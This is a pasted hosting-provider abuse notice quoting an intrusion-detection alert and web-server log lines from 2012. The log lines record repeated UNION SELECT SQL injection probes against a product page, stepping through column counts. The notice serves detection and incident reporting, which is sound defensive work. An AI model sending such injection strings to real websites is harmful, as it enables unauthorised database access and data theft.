Guest User

Untitled

a guest
May 20th, 2018
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.70 KB | None | 0 0
  1. Slicehost Support
  2. ________________________
  3.  
  4. Rule: 31152 fired (level 13) -> "Multiple SQL injection attempts from
  5. same souce ip."
  6. Portion of the log(s):
  7.  
  8. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  9. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  10. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  11. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  12. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  13. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  14. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  15. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  16. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  17. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  18. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  19. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  20. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  21. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  22. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  23. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  24. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  25. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  26. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  27. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  28. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  29. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  30. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  31. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  32. 184.106.65.197 - - [09/Jan/2012:03:19:51 -0500] "GET
  33. /view_prod.php?id=1/prod.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a--
  34. HTTP/1.0" 500 3506 "-" "lwp-trivial/1.41"
  35.  
  36. NOTES:
  37.  
  38. URL Injection attacks typically mean the server for which the IP
  39. address of the attacker is bound is a compromised server.
Add Comment
Please, Sign In to add comment